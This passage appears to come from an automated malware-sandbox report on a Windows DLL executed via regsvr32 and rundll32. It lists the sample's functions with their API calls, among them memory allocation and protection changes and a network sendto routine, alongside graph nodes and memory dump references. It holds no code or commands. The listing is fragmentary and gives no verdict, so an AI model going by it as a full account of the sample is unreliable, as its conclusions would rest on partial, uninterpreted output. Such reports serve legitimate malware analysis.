                          • GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1002179C,?,?), ref: 10021505
                          • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10021519
                          • ConvertDefaultLocale.KERNEL32(?), ref: 10021555
                          • ConvertDefaultLocale.KERNEL32(?), ref: 10021563
                          • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10021580
                          • ConvertDefaultLocale.KERNEL32(?), ref: 100215AB
                          • ConvertDefaultLocale.KERNEL32(000003FF), ref: 100215B4
                          • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 100215CD
                          • EnumResourceLanguagesA.KERNEL32 ref: 100215EA
                          • ConvertDefaultLocale.KERNEL32(?), ref: 1002161D
                          • ConvertDefaultLocale.KERNEL32(00000000), ref: 10021626
                          • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10021669
                          • _memset.LIBCMT ref: 10021689
                          Strings
                          Similarity
                          • API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
                          • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                          • API String ID: 3537336938-2299501126
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,1004E800,0000000C,1003474B,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C), ref: 10034622
                          • __crt_waiting_on_module_handle.LIBCMT ref: 1003462D
                            • Part of subcall function 1003065C: Sleep.KERNEL32(000003E8,00000000,?,10034573,KERNEL32.DLL,?,?,10034907,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F), ref: 10030668
                            • Part of subcall function 1003065C: GetModuleHandleW.KERNEL32(00000000,?,10034573,KERNEL32.DLL,?,?,10034907,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F,?), ref: 10030671
                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 10034656
                          • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 10034666
                          • __lock.LIBCMT ref: 10034688
                          • InterlockedIncrement.KERNEL32(?), ref: 10034695
                          • __lock.LIBCMT ref: 100346A9
                          • ___addlocaleref.LIBCMT ref: 100346C7
                          Strings
                          Similarity
                          • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                          • API String ID: 1028249917-2843748187
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __EH_prolog3_catch.LIBCMT ref: 10023423
                          • FindResourceA.KERNEL32(?,?,00000005), ref: 10023456
                          • LoadResource.KERNEL32(?,00000000), ref: 1002345E
                            • Part of subcall function 100275EC: UnhookWindowsHookEx.USER32(?), ref: 1002761C
                          • LockResource.KERNEL32(?,00000024,1000150C,00000000,057BE668), ref: 1002346F
                          • GetDesktopWindow.USER32 ref: 100234A2
                          • IsWindowEnabled.USER32(?), ref: 100234B0
                          • EnableWindow.USER32(?,00000000), ref: 100234BF
                            • Part of subcall function 1002A492: IsWindowEnabled.USER32(?), ref: 1002A49B
                            • Part of subcall function 1002A4AD: EnableWindow.USER32(?,00000000), ref: 1002A4BE
                          • EnableWindow.USER32(?,00000001), ref: 100235A4
                          • GetActiveWindow.USER32 ref: 100235AF
                          • SetActiveWindow.USER32(?,?,00000024,1000150C,00000000,057BE668), ref: 100235BD
                          • FreeResource.KERNEL32(?,?,00000024,1000150C,00000000,057BE668), ref: 100235D9
                          Similarity
                          • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchHookLoadLockUnhookWindows
                          • String ID:
                          • API String ID: 964565984-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Similarity
                          • API ID: MessageSend$_strlen
                          • String ID:
                          • API String ID: 3697954797-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GlobalLock.KERNEL32 ref: 1002104C
                          • lstrcmpA.KERNEL32(?,?), ref: 10021058
                          • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1002106A
                          • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1002108A
                          • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10021092
                          • GlobalLock.KERNEL32 ref: 1002109C
                          • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 100210A9
                          • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 100210C1
                            • Part of subcall function 1002A801: GlobalFlags.KERNEL32(?), ref: 1002A810
                            • Part of subcall function 1002A801: GlobalUnlock.KERNEL32(?,?,?,?,10021A27,?,00000214,1000148F), ref: 1002A822
                            • Part of subcall function 1002A801: GlobalFree.KERNEL32 ref: 1002A82D
                          Similarity
                          • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                          • String ID:
                          • API String ID: 168474834-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Similarity
                          • API ID: Message$Window$PeekSendUpdate$LongParent
                          • String ID:
                          • API String ID: 2853195852-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Strings
                          Similarity
                          • API ID: LongWindow$MessageSend_memset
                          • String ID: ,
                          • API String ID: 2997958587-3772416878
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __EH_prolog3_GS.LIBCMT ref: 10022468
                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1002254E
                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 1002256B
                          • RegCloseKey.ADVAPI32(?), ref: 1002258B
                          • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 100225A6
                          Strings
                          Similarity
                          • API ID: CloseEnumH_prolog3_OpenQueryValue
                          • String ID: Software\
                          • API String ID: 1666054129-964853688
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __EH_prolog3_catch_GS.LIBCMT ref: 100222EA
                          • RegOpenKeyA.ADVAPI32(?,?,?), ref: 10022378
                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 1002239B
                            • Part of subcall function 1002228B: __EH_prolog3.LIBCMT ref: 10022292
                          Strings
                          Similarity
                          • API ID: EnumH_prolog3H_prolog3_catch_Open
                          • String ID: Software\Classes\
                          • API String ID: 3518408925-1121929649
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetCapture.USER32 ref: 1002B279
                          • SendMessageA.USER32 ref: 1002B294
                          • GetFocus.USER32 ref: 1002B2A9
                          • SendMessageA.USER32 ref: 1002B2B7
                          • GetLastActivePopup.USER32(?), ref: 1002B2E0
                          • SendMessageA.USER32 ref: 1002B2ED
                            • Part of subcall function 1002881E: GetWindowLongA.USER32 ref: 10028844
                            • Part of subcall function 1002881E: GetParent.USER32(?), ref: 10028852
                          • SendMessageA.USER32 ref: 1002B313
                          Similarity
                          • API ID: MessageSend$ActiveCaptureFocusLastLongParentPopupWindow
                          • String ID:
                          • API String ID: 3338174999-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LeaveCriticalSection.KERNEL32(?), ref: 1002B013
                          • __CxxThrowException@8.LIBCMT ref: 1002B01D
                            • Part of subcall function 100312CD: RaiseException.KERNEL32(?,?,1004B6B4,1004F1B8,?,?,?,100203CA,1004B6B4,1004F1B8,00000000,00000000), ref: 1003130F
                          • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002B034
                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B041
                            • Part of subcall function 10023B23: __CxxThrowException@8.LIBCMT ref: 10023B39
                          • _memset.LIBCMT ref: 1002B060
                          • TlsSetValue.KERNEL32(?,00000000), ref: 1002B071
                          • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B092
                          Similarity
                          • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                          • String ID:
                          • API String ID: 356813703-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __EH_prolog3_catch.LIBCMT ref: 1002326D
                          • GlobalLock.KERNEL32 ref: 10023345
                          • CreateDialogIndirectParamA.USER32(?,?,?,10022CA4,00000000), ref: 10023374
                          • DestroyWindow.USER32(00000000,?,1000150C,00000000,057BE668), ref: 100233EE
                          • GlobalUnlock.KERNEL32(?,?,1000150C,00000000,057BE668), ref: 100233FE
                          • GlobalFree.KERNEL32 ref: 10023407
                          Similarity
                          • API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
                          • String ID:
                          • API String ID: 3003189058-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __CreateFrameInfo.LIBCMT ref: 10037760
                            • Part of subcall function 10030430: __getptd.LIBCMT ref: 1003043E
                            • Part of subcall function 10030430: __getptd.LIBCMT ref: 1003044C
                          • __getptd.LIBCMT ref: 1003776A
                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                          • __getptd.LIBCMT ref: 10037778
                          • __getptd.LIBCMT ref: 10037786
                          • __getptd.LIBCMT ref: 10037791
                          • _CallCatchBlock2.LIBCMT ref: 100377B7
                            • Part of subcall function 100304D5: __CallSettingFrame@12.LIBCMT ref: 10030521
                            • Part of subcall function 1003785E: __getptd.LIBCMT ref: 1003786D
                            • Part of subcall function 1003785E: __getptd.LIBCMT ref: 1003787B
                          Similarity
                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                          • String ID:
                          • API String ID: 1602911419-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10025150
                          • GetSystemMetrics.USER32 ref: 10025168
                          • GetSystemMetrics.USER32 ref: 1002516F
                          Strings
                          Similarity
                          • API ID: System$Metrics$InfoParameters
                          • String ID: B$DISPLAY
                          • API String ID: 3136151823-3316187204
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __getptd.LIBCMT ref: 1003748E
                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                          • __getptd.LIBCMT ref: 1003749F
                          • __getptd.LIBCMT ref: 100374AD
                          Strings
                          Similarity
                          • API ID: __getptd$__amsg_exit__getptd_noexit
                          • String ID: MOC$csm
                          • API String ID: 803148776-1389381023
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlenA.KERNEL32(?,?,00000000), ref: 1002A76E
                          • _memset.LIBCMT ref: 1002A78B
                          • GetWindowTextA.USER32 ref: 1002A7A5
                          • lstrcmpA.KERNEL32(00000000,?), ref: 1002A7B7
                          • SetWindowTextA.USER32(?,?), ref: 1002A7C3
                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                          Similarity
                          • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
                          • String ID:
                          • API String ID: 289641511-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __getptd.LIBCMT ref: 10033049
                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                          • __amsg_exit.LIBCMT ref: 10033069
                          • __lock.LIBCMT ref: 10033079
                          • InterlockedDecrement.KERNEL32(?), ref: 10033096
                          • InterlockedIncrement.KERNEL32(040A1620), ref: 100330C1
                          Similarity
                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                          • String ID:
                          • API String ID: 4271482742-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Strings
                          Similarity
                          • API ID: Fputc$H_prolog3_
                          • String ID:
                          • API String ID: 2569218679-3916222277
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
                            • Part of subcall function 1002A6AB: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
                            • Part of subcall function 1002A6AB: LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
                            • Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714
                            • Part of subcall function 1002ACFB: __EH_prolog3_catch.LIBCMT ref: 1002AD02
                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                          • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 100286CC
                          • FreeLibrary.KERNEL32(?), ref: 100286DC
                          Strings
                          Similarity
                          • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
                          • String ID: HtmlHelpA$hhctrl.ocx
                          • API String ID: 3274081130-63838506
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32,1003198E), ref: 1003B6EF
                          • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003B6FF
                          Strings
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: IsProcessorFeaturePresent$KERNEL32
                          • API String ID: 1646373207-3105848591
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SetLastError.KERNEL32(0000007F), ref: 100031BF
                          • SetLastError.KERNEL32(0000007F), ref: 100031EB
                          Similarity
                          • API ID: ErrorLast
                          • String ID:
                          • API String ID: 1452528299-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __EH_prolog3_GS.LIBCMT ref: 10043377
                          • _fgetc.LIBCMT ref: 100434AD
                            • Part of subcall function 100432DD: std::_String_base::_Xlen.LIBCPMT ref: 100432F3
                          • _memcpy_s.LIBCMT ref: 10043472
                          • _ungetc.LIBCMT ref: 100434F8
                          Similarity
                          • API ID: H_prolog3_String_base::_Xlen_fgetc_memcpy_s_ungetcstd::_
                          • String ID:
                          • API String ID: 9762108-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Similarity
                          • API ID: __msize_malloc
                          • String ID:
                          • API String ID: 1288803200-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,10003158), ref: 100033CE
                          • GetProcessHeap.KERNEL32(00000000,00000000,?,?,10003158), ref: 100033DA
                          • HeapFree.KERNEL32(00000000,?,?,10003158), ref: 100033E1
                          Strings
                          Similarity
                          • API ID: FreeHeap$ProcessVirtual
                          • String ID: Oxt
                          • API String ID: 190046822-1245641732
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Similarity
                          • API ID: Exception@8Throw$__cftof
                          • String ID:
                          • API String ID: 887240167-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • FindResourceA.KERNEL32(?,00000000,00000005), ref: 100231A8
                          • LoadResource.KERNEL32(?,00000000), ref: 100231B0
                          • LockResource.KERNEL32(00000000), ref: 100231C2
                          • FreeResource.KERNEL32(00000000), ref: 10023210
                          Similarity
                          • API ID: Resource$FindFreeLoadLock
                          • String ID:
                          • API String ID: 1078018258-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __EH_prolog3.LIBCMT ref: 100217B5
                            • Part of subcall function 1002299D: __EH_prolog3.LIBCMT ref: 100229A4
                          • __strdup.LIBCMT ref: 100217D7
                          • GetCurrentThread.KERNEL32 ref: 10021804
                          • GetCurrentThreadId.KERNEL32 ref: 1002180D
                          Similarity
                          • API ID: CurrentH_prolog3Thread$__strdup
                          • String ID:
                          • API String ID: 4206445780-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Similarity
                          • API ID: MessageSend$Capture
                          • String ID:
                          • API String ID: 1665607226-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Similarity
                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                          • String ID:
                          • API String ID: 3016257755-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • FindResourceA.KERNEL32(?,?,000000F0), ref: 1002A27D
                          • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A289
                          • LockResource.KERNEL32(00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A296
                          • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A2B2
                          Memory Dump Source
                          • Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                          Similarity
                          • API ID: Resource$FindFreeLoadLock
                          • String ID:
                          • API String ID: 1078018258-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                          Similarity
                          • API ID: _memsethtonsinet_addrsendto
                          • String ID:
                          • API String ID: 1158618643-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • EnableWindow.USER32(?,00000001), ref: 100235A4
                          • GetActiveWindow.USER32 ref: 100235AF
                          • SetActiveWindow.USER32(?,?,00000024,1000150C,00000000,057BE668), ref: 100235BD
                          • FreeResource.KERNEL32(?,?,00000024,1000150C,00000000,057BE668), ref: 100235D9
                            • Part of subcall function 1002A4AD: EnableWindow.USER32(?,00000000), ref: 1002A4BE
                          Memory Dump Source
                          • Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                          Similarity
                          • API ID: Window$ActiveEnable$FreeResource
                          • String ID:
                          • API String ID: 253586258-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10021762
                          • PathFindExtensionA.SHLWAPI(?), ref: 10021778
                            • Part of subcall function 100214CB: __EH_prolog3_GS.LIBCMT ref: 100214D5
                            • Part of subcall function 100214CB: GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1002179C,?,?), ref: 10021505
                            • Part of subcall function 100214CB: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10021519
                            • Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 10021555
                            • Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 10021563
                            • Part of subcall function 100214CB: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10021580
                            • Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 100215AB
                            • Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(000003FF), ref: 100215B4
                            • Part of subcall function 100214CB: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10021669
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                          Similarity
                          • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
                          • String ID: %s%s.dll
                          • API String ID: 1311856149-1649984862
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
                          • InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
                          • LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714
                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                          Memory Dump Source
                          • Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                          Similarity
                          • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
                          • String ID:
                          • API String ID: 3253506028-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Executed Functions

                          Control-flow Graph

                          APIs
                          • EnterCriticalSection.KERNEL32(100863DC,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002ADBF
                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002AE15
                          • GlobalHandle.KERNEL32(02D20628), ref: 1002AE1E
                          • GlobalUnlock.KERNEL32(00000000,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AE28
                          • GlobalReAlloc.KERNEL32 ref: 1002AE41
                          • GlobalHandle.KERNEL32(02D20628), ref: 1002AE53
                          • GlobalLock.KERNEL32 ref: 1002AE5A
                          • LeaveCriticalSection.KERNEL32(?,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AE63
                          • GlobalLock.KERNEL32 ref: 1002AE6F
                          • _memset.LIBCMT ref: 1002AE89
                          • LeaveCriticalSection.KERNEL32(?), ref: 1002AEB7
                          Memory Dump Source
                          • Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp
                          • Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp
                          • Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp
                          • Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp
                          • Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp
                          • Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp
                          • Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                          Similarity
                          • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                          • String ID:
                          • API String ID: 496899490-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • __lock.LIBCMT ref: 1002E595
                            • Part of subcall function 10035865: __mtinitlocknum.LIBCMT ref: 1003587B
                            • Part of subcall function 10035865: __amsg_exit.LIBCMT ref: 10035887
                            • Part of subcall function 10035865: EnterCriticalSection.KERNEL32(00000000,00000000,?,1003481B,0000000D,1004E828,00000008,10034912,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F), ref: 1003588F
                          • ___sbh_find_block.LIBCMT ref: 1002E5A0
                          • ___sbh_free_block.LIBCMT ref: 1002E5AF
                          • RtlFreeHeap.NTDLL(00000000,00000000,1004E648,0000000C,10034761,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C), ref: 1002E5DF
                          • GetLastError.KERNEL32(?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880,00000000,00000000,?,1003481B,0000000D), ref: 1002E5F0
                          Memory Dump Source
                          • Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                          Similarity
                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                          • String ID:
                          • API String ID: 2714421763-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          control_flow_graph 51 100036a0-100036bb call 1002e654 53 100036c0-100036e5 51->53 55 10003896-100038b1 53->55 56 100036eb-1000388e 53->56 58 100038b7-10004a31 55->58 59 10004a39-10004a3d 55->59 56->55 58->59
                          APIs
                          • _malloc.LIBCMT ref: 100036BB
                            • Part of subcall function 1002E654: __FF_MSGBANNER.LIBCMT ref: 1002E677
                            • Part of subcall function 1002E654: __NMSG_WRITE.LIBCMT ref: 1002E67E
                            • Part of subcall function 1002E654: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880), ref: 1002E6CB
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                          Similarity
                          • API ID: AllocateHeap_malloc
                          • String ID: +';
                          • API String ID: 501242067-2694261586
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                            • Part of subcall function 100033F0: _malloc.LIBCMT ref: 100033F9
                          • _malloc.LIBCMT ref: 100034B7
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                          Similarity
                          • API ID: _malloc
                          • String ID: +';
                          • API String ID: 1579825452-2694261586
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          control_flow_graph 96 10002690-100026a0 97 100026a2-100026a7 96->97 98 100026ac-100026b8 96->98 99 100027ac-100027af 97->99 100 10002714-10002776 98->100 101 100026ba-100026c5 98->101 102 10002784-100027a1 VirtualProtect 100->102 103 10002778-10002781 100->103 104 100026c7-100026ce 101->104 105 1000270a-1000270f 101->105 106 100027a3-100027a5 102->106 107 100027a7 102->107 103->102 108 100026d0-100026de 104->108 109 100026f2-10002704 VirtualFree 104->109 105->99 106->99 107->99 108->109 110 100026e0-100026f0 108->110 109->105 110->105 110->109
                          APIs
                          • VirtualFree.KERNELBASE(?,00000000,00004000), ref: 10002704
                          Memory Dump Source
                          • Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                          Similarity
                          • API ID: FreeVirtual
                          • String ID:
                          • API String ID: 1263568516-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          control_flow_graph 111 100024d0-100024fe 112 10002512-1000251e 111->112 113 10002524-1000252b 112->113 114 10002616 112->114 115 10002593-100025ae call 100024a0 113->115 116 1000252d-1000253a 113->116 117 1000261b-1000261e 114->117 126 100025b0-100025b2 115->126 127 100025b4-100025d9 VirtualAlloc 115->127 119 1000253c-1000255e VirtualAlloc 116->119 120 1000258e 116->120 123 10002560-10002562 119->123 124 10002567-1000258b call 100022d0 119->124 120->112 123->117 124->120 126->117 129 100025db-100025dd 127->129 130 100025df-1000260e call 10002320 127->130 129->117 130->114
                          APIs
                          • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000303F,00000000), ref: 10002551
                          • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,1001DF0A,8B118BBC,?,1000303F,00000000,1001DF0A,?), ref: 100025CC
                          Memory Dump Source
                          • Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

